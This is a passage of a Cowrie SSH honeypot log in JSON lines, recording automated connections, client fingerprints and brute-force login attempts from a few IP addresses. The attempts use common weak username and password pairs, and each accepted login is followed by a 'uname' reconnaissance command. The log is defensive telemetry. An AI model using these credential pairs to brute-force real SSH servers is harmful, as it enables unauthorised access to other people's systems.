cCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:13:50.328894Z","src_ip":"83.168.105.65","session":"d8274c9c6d48"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@123","message":"login attempt [root/Admin@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:13:50.442466Z","src_ip":"83.168.105.65","session":"d8274c9c6d48"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:13:50.592926Z","src_ip":"83.168.105.65","session":"d8274c9c6d48"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T12:13:50.593582Z","src_ip":"83.168.105.65","session":"d8274c9c6d48"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:13:50.637938Z","src_ip":"83.168.105.65","session":"d8274c9c6d48"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:13:50.638960Z","src_ip":"83.168.105.65","session":"d8274c9c6d48"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59828,"dst_ip":"1.2.3.4","dst_port":22,"session":"0dc5fbfa098e","protocol":"ssh","message":"New connection: 212.227.235.229:59828 (1.2.3.4:22) [session: 0dc5fbfa098e]","sensor":"my-vps","timestamp":"2025-08-26T12:14:03.504620Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:14:03.818003Z","src_ip":"212.227.235.229","session":"0dc5fbfa098e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:14:03.819326Z","src_ip":"212.227.235.229","session":"0dc5fbfa098e"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":37538,"dst_ip":"1.2.3.4","dst_port":22,"session":"aafa483be709","protocol":"ssh","message":"New connection: 196.251.86.249:37538 (1.2.3.4:22) [session: aafa483be709]","sensor":"my-vps","timestamp":"2025-08-26T12:14:04.429896Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:14:05.062175Z","src_ip":"196.251.86.249","session":"aafa483be709"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:14:05.062920Z","src_ip":"196.251.86.249","session":"aafa483be709"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":54548,"dst_ip":"1.2.3.4","dst_port":22,"session":"d15ed74f606c","protocol":"ssh","message":"New connection: 83.168.105.65:54548 (1.2.3.4:22) [session: d15ed74f606c]","sensor":"my-vps","timestamp":"2025-08-26T12:14:05.793611Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:14:05.794500Z","src_ip":"83.168.105.65","session":"d15ed74f606c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:14:05.835142Z","src_ip":"83.168.105.65","session":"d15ed74f606c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"654321","message":"login attempt [admin/654321] failed","sensor":"my-vps","timestamp":"2025-08-26T12:14:05.843681Z","src_ip":"212.227.235.229","session":"0dc5fbfa098e"}
{"eventid":"cowrie.login.success","username":"root","password":"qq123456","message":"login attempt [root/qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:14:05.958984Z","src_ip":"83.168.105.65","session":"d15ed74f606c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:14:06.111066Z","src_ip":"83.168.105.65","session":"d15ed74f606c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T12:14:06.111765Z","src_ip":"83.168.105.65","session":"d15ed74f606c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:14:06.153532Z","src_ip":"83.168.105.65","session":"d15ed74f606c"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:14:06.155209Z","src_ip":"83.168.105.65","session":"d15ed74f606c"}
{"eventid":"cowrie.login.failed","username":"test","password":"123","message":"login attempt [test/123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:14:06.946153Z","src_ip":"196.251.86.249","session":"aafa483be709"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:14:07.329515Z","src_ip":"212.227.235.229","session":"0dc5fbfa098e"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:14:08.512636Z","src_ip":"196.251.86.249","session":"aafa483be709"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":58838,"dst_ip":"1.2.3.4","dst_port":22,"session":"280b2fc2f685","protocol":"ssh","message":"New connection: 83.168.105.65:58838 (1.2.3.4:22) [session: 280b2fc2f685]","sensor":"my-vps","timestamp":"2025-08-26T12:14:21.181628Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:14:21.182480Z","src_ip":"83.168.105.65","session":"280b2fc2f685"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:14:21.220194Z","src_ip":"83.168.105.65","session":"280b2fc2f685"}
{"eventid":"cowrie.login.failed","username":"user","password":"123456","message":"login attempt [user/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T12:14:21.336720Z","src_ip":"83.168.105.65","session":"280b2fc2f685"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:14:22.375964Z","src_ip":"83.168.105.65","session":"280b2fc2f685"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":43876,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d1bba106fdf","protocol":"ssh","message":"New connection: 83.168.105.65:43876 (1.2.3.4:22) [session: 6d1bba106fdf]","sensor":"my-vps","timestamp":"2025-08-26T12:14:36.602898Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:14:36.604485Z","src_ip":"83.168.105.65","session":"6d1bba106fdf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:14:36.640296Z","src_ip":"83.168.105.65","session":"6d1bba106fdf"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazXSW@","message":"login attempt [root/1qazXSW@] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:14:36.749543Z","src_ip":"83.168.105.65","session":"6d1bba106fdf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:14:36.839072Z","src_ip":"83.168.105.65","session":"6d1bba106fdf"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T12:14:36.839760Z","src_ip":"83.168.105.65","session":"6d1bba106fdf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:14:36.876583Z","src_ip":"83.168.105.65","session":"6d1bba106fdf"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:14:36.877746Z","src_ip":"83.168.105.65","session":"6d1bba106fdf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48978,"dst_ip":"1.2.3.4","dst_port":22,"session":"ebc47d7b1208","protocol":"ssh","message":"New connection: 212.227.235.229:48978 (1.2.3.4:22) [session: ebc47d7b1208]","sensor":"my-vps","timestamp":"2025-08-26T12:14:38.248472Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:14:38.659707Z","src_ip":"212.227.235.229","session":"ebc47d7b1208"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:14:38.660677Z","src_ip":"212.227.235.229","session":"ebc47d7b1208"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","message":"login attempt [ubuntu/ubuntu] failed","sensor":"my-vps","timestamp":"2025-08-26T12:14:40.650039Z","src_ip":"212.227.235.229","session":"ebc47d7b1208"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:14:42.668537Z","src_ip":"212.227.235.229","session":"ebc47d7b1208"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":55886,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0e518a93ccc","protocol":"ssh","message":"New connection: 83.168.105.65:55886 (1.2.3.4:22) [session: c0e518a93ccc]","sensor":"my-vps","timestamp":"2025-08-26T12:14:52.011096Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:14:52.012005Z","src_ip":"83.168.105.65","session":"c0e518a93ccc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:14:52.052444Z","src_ip":"83.168.105.65","session":"c0e518a93ccc"}
{"eventid":"cowrie.login.failed","username":"svnuser","password":"svnuser","message":"login attempt [svnuser/svnuser] failed","sensor":"my-vps","timestamp":"2025-08-26T12:14:52.175728Z","src_ip":"83.168.105.65","session":"c0e518a93ccc"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:14:53.219199Z","src_ip":"83.168.105.65","session":"c0e518a93ccc"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":37106,"dst_ip":"1.2.3.4","dst_port":22,"session":"f78d79cd7713","protocol":"ssh","message":"New connection: 196.251.86.249:37106 (1.2.3.4:22) [session: f78d79cd7713]","sensor":"my-vps","timestamp":"2025-08-26T12:15:04.582350Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:15:05.240516Z","src_ip":"196.251.86.249","session":"f78d79cd7713"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:15:05.241578Z","src_ip":"196.251.86.249","session":"f78d79cd7713"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":53256,"dst_ip":"1.2.3.4","dst_port":22,"session":"475b5b8a10c9","protocol":"ssh","message":"New connection: 83.168.105.65:53256 (1.2.3.4:22) [session: 475b5b8a10c9]","sensor":"my-vps","timestamp":"2025-08-26T12:15:07.387171Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:15:07.387894Z","src_ip":"83.168.105.65","session":"475b5b8a10c9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"